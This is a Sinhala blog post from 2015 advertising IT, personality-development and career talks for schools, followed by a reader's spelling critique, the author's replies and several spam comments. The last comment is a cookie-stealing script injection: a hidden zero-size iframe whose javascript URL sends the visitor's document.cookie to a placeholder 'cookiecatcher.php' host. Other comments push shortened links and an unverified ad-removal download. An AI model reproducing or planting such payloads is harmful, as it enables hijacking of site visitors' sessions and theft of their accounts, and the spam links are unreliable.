Wednesday, September 30, 2015

පාසල් වලට තොරතුරු තාක්ෂණයේ නව දොරටුවක් විවරවන වගයි !

තොරතුරු තාක්ෂණය කියන්නේ අතිශයින්ම වෙනස්වන විශයක්. ඊයේ තිබුන දේ අද වෙද්දී යාවත්කාලීන වෙලා තියෙන්න පුළුවන්. අවුරුදු ගණනාවකට කලින් අයින් කරපු දෙයක් ආයෙත් අද වෙද්දී භාවිතයට අරගෙන වෙන්නත් පුළුවන්.
පාසල් විශය නිර්දේශයටම කොටුවෙලා තොරතුරු තාක්ෂණය ඉගෙන ගන්න බැහැ. මොකද කියනවානම් ලෝකේ දැනට තියෙන අති විශාලම ක්ෂේත්‍රය තමයි තොරතුරු තාක්ෂණය කියන්නේ.
තත්පරයෙන් තත්පරය බිටුවෙන් බිටුව මේ තොරතුරු සාගරය විශාල වෙනවා. මේ විශාල වෙන තොරතුරු සාගරයේ යාත්‍රා කරන්න නම් තමන්ටම කියලා බ්‍රෑන්ඩ් එකක් හදාගන්නඕනේ. තමන්වම මාකට් වෙන්න ඕනේ.
තනියම HTML කෝඩ් එකක් ලියනවා වගේ නෙමෙයි ආයතනයක රැකියාවකට ගිහින් වෙබ් අඩවියක් නිර්මාණය කරන එක. කැමති අයත් එක්ක වගේම අකමැති අයත් එක්කත් වැඩ කරන්න වෙනවා.
තොරතුරු තාක්ෂණය විතරක් ඉගනගෙන මදි, අනාගතය ජය ගන්න නිසි වෘත්තීමය දැනීමක් තිබීම අත්‍යාවශ්‍යයි. නැතිනම් උපාධි සහතිකයකට පමණක් සීමා වෙන්න වෙනවා තමන්ගේ අසීමිත බුද්ධි හැකියාව.
එන්න, අපිත් එක්ක ඩිජිටල් දොරටු විවර කරන්න. අපි එනවා ඔබේ පාසලට. ඇවිත් අපි කථා කරමු, තොරතුරු තාක්ෂණය, පෞරුශ වර්ධනය, වෘත්තීයමය අධ්‍යාපනය.
ඔබේ පාසලට මේ මහඟු අවස්ථාව ලබාගන්න අපිට කථා කරන්න.
හිමේෂ් - +94 76 54 64 998 / himesh@eezpal.com

7 comments:

  1. බිටුවෙන් බිටුව කියන්නේ මොකක්ද? bit කියන වචනය වෙනුවෙන්ද හැදුවේ? එහෙනම් ඒක බිට්ටුවෙන් බිට්ටුව වියයුතුයි. නමුත් ඔයවගේ හිතුමතේට වචන හදන්න ගියාම බිට්ටුව පිට්ටුවක් වෙනවා.

    ඉස්කෝල වලට මොකටද බ්‍රෑන්ඩ්? බෑන්ඩ් නම් ඕනේ. මාකට් කරන්නේ ඉස්කෝලේද නැත්නම් ඉස්කෝල නිසා මේ පරිගණක ආයතන තම මාකට් එක වර්ධනය කරගන්න දඟලනවද?

    වෘත්තීමය නෙවෙයි වෘත්තීයමය. පෞර්ශ නෙවෙයි පෞරුෂ. ඉස්කෝලවලට ගිහිල්ලා ඔය කුණුහරප උගන්නන්න එපා.

    ReplyDelete
    Replies
    1. බිටුවෙන් කියලා කියන්නේ සිංහල පාරිභාෂික වචන මාලාවේ දක්වලා තියෙන වචනයක්. :) බිට්ටුව කියලා නෙමෙයි ඒකේ දක්වලා තියෙන්නේ.

      අනිත් වචන දෙක නම් මුල් නෝට්පෑඩ් එකෙන් කොපි කරද්දී වෙනස් වෙලා.

      අපිට අපේ බ්‍රෑන්ඩ් එක මාකට් කරගන්න උවමනාවක් නැහැ සහ, අපිට පාසල් අතර බ්‍රෑන්ඩ් එක මාකට් කලා කියලා කිසිම බිස්නස් එකක් එන්නෙත් නැහැ. අපේ බ්‍රෑන්ඩ් එකේ ටාගට් එක ආයතන මිසක් පාසල් ළමුන් නෙමෙයි. ඉතින් අපි පාසලක වැඩසටහනක් කරා කියලා අපේ බ්‍රෑන්ඩ් එකේ මාකට් එකට කිසිම දැනෙන ඉම්පැක්ට් එකක් වෙන්නේ නැහැ.

      අනිත් දේ ඔබතුමා ඇනෝනිමස් නැතිව ඇත්ත ගිණුමෙන් මේ චෝදනාව කලානම් මම ගොඩක් සතුටු වෙනවා :)

      වචන වැරදි තැන් පෙන්වලා දුන්නාට ස්තූතියි. මොකද මේකේ භාවිතා වෙන්නේ Windows 7 වලට ආව Unicode පැක් එක Windows 8 උඩ. සමහර වචන ටයිප් කරද්දී වෙනස් වෙනවා. ප්‍රෙද්ශය - මේ ලියලා තියෙන්නේ ප්‍ර දේශය කියලා.

      Delete
    2. අනිත් දේ බ්‍රෑන්ඩ් එක ගැනනම් ඔබතුමා කියලා තියෙන දේ පිළිගන්න බැහැ. මොකද තමන්ට ආයතනයකින් ඉල්ලුමක් හදාගන්න අනිවාර්යයෙන් බ්‍රෑන්ඩ් එකක් හදාගත යුතුමයි. සමහර විට ඔබතුමා රජයේ සේවකයෙක් වෙන්න ඇති.

      Delete
  2. More details : http://adf.ly/1XI633

    ReplyDelete
  3. Webhoster.pk is providing suitable Web Hosting in Pakistan and fulfill your needs according to your requirements , We are Best comapny of Web Hosting Pakistan and offering so many plans like Budget Web Hosting - Business Web Hosting - Reseller Web Hosting - Vps Hosting - Dedicated Server Hosting choose the plan according to your requirement and get benefit from us.

    ReplyDelete
  4. KMPlayer ඒක භාවිතා කරනවනං මෙන්න මේ සොෆ්ට්වෙයා ඒකත් පාවිච්චි කරන්න, මේකෙන් පුලුවන් KMPlayer ඒකේ තියෙන අැඩ් සම්පූර්ණයෙන්ම අයින් කරන්න..
    Size : 145Kb
    screenshot : goo.gl/RSCEtz
    Download link : goo.gl/YWltcD

    Thank you

    ReplyDelete
  5. <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>

    ReplyDelete

Copyright © ළහිරුගේ සිංහල Blog අඩවිය - සිංහල බ්ලොග් | Powered by Blogger

Design by Anders NorenUp ↑